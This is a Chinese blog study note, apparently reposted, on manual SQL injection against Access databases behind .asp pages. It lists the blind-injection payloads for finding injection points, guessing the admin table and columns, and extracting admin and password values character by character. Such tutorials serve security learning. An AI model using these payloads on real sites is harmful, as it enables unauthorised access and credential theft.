SQL注入学习笔记-手工注入access数据库

本文详细介绍了如何通过SQL注入攻击来探测网站的安全漏洞。包括如何判断网站是否存在注入点、猜解表名、列名以及字段内容的具体步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

欢迎拜访我的新博客~~
http://blog.xieldy.cn

1. 网络协议安全

1.1SQL注入原理-手工注入access数据库

  1. 目标网站特征:以【.asp?id=】结尾的链接。
  2. 判断网站是否存在注入点:

    1. 在链接结尾添加【'】如果网站数据库报错,则说明可能可以,进行下一步。
    2. 在链接结尾添加【and 1=1】如果网站可以正常显示,说明可能存在注入点。
    3. 在链接结尾添加【and 1=2】如果返回数据库错误,则说明该网站存在注入点。
  3. 猜解表名:

    1.在链接末尾添加语句【and exists(select * from admin)】,页面正常显示,说明存在表名 admin。

  4. 猜解列名

    1. 在链接末尾添加语句【and exists(select admin from admin)】,页面显示正常,即表中存在admin列。
    2. 同样的方法,添加【and exists(select password from admin)】,页面显示正常,说明存在列password。
  5. 猜测字段内容

    1. 猜测字段长度,在链接末尾添加语句【and (select top 1 len (admin) from admin)>1】,如果页面显示正常,数字依次加1。最后可得到字段长度。
    2. 同样的方法,添加语句【and (select top 1 acs(mid(admin,1,1)) from admin)>数字】,可以猜解出第一条记录第一位字符的ASCII码。
    3. 同样的方法可以得到admin字段的内容和password字段的内容。

转载于:https://www.cnblogs.com/xieldy/p/6781216.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值